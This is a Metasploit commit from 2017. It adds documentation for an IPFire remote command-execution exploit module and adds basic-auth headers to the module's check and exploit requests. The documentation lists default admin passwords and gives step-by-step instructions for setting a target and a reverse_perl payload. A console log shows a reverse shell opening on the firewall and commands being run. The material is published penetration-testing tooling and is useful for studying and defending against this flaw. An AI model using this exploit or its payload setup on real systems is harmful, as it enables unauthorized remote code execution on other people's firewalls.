module working and docs

h00die · h00die · commit 46ffd250a044 · 2017-06-14T21:15:56.000-04:00
diff --git a/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md
@@ -0,0 +1,48 @@
+## Vulnerable Application
+
+  Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
+
+This module has been verified against:
+
+1. 2.19 core 100
+2. 2.19 core 110 (exploit-db, not metasploit module)
+
+## Verification Steps
+
+  1. Install the firewall
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
+  4. Do: ```set password admin``` or whatever it was set to at install
+  5. Do: ```set rhost 10.10.10.10```
+  6. Do: ```set payload cmd/unix/reverse_perl```
+  7. Do: ```set lhost 192.168.2.229```
+  8. Do: ```exploit```
+  9. You should get a shell.
+
+## Options
+
+  **PASSWORD**
+
+  Password is set at install.  May be blank, 'admin', or 'ipfire'.
+
+## Scenarios
+
+  ```
+    msf > use exploit/linux/http/ipfire_oinkcode_exec 
+    msf exploit(ipfire_oinkcode_exec) > set password admin
+    password => admin
+    msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
+    rhost => 192.168.2.201
+    msf exploit(ipfire_oinkcode_exec) > set verbose true
+    verbose => true
+    msf exploit(ipfire_oinkcode_exec) > check
+    [*] 192.168.2.201:444 The target appears to be vulnerable.
+    msf exploit(ipfire_oinkcode_exec) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
+    id
+    uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
+    whoami
+    nobody
+  ```
diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
@@ -59,9 +59,12 @@ def initialize(info = {})
 
   def check
     begin
+      # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
+      # after a chat with @bcoles in IRC.
       res = send_request_cgi(
         'uri'       => '/cgi-bin/pakfire.cgi',
-        'method'    => 'GET'
+        'method'    => 'GET',
+        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
       )
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
       fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
@@ -79,16 +82,18 @@ def check
 
   def exploit
     begin
-
+      # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
+      # after a chat with @bcoles in IRC.
       res = send_request_cgi(
         'uri'           => '/cgi-bin/ids.cgi',
         'method'        => 'POST',
         'ctype'         => 'application/x-www-form-urlencoded',
+        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'headers'       =>
           {
             'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
           },
-        'data'          => {
+        'vars_post'          => {
             'ENABLE_SNORT_GREEN' => 'on',
             'ENABLE_SNORT' => 'on',
             'RULES' => 'registered',
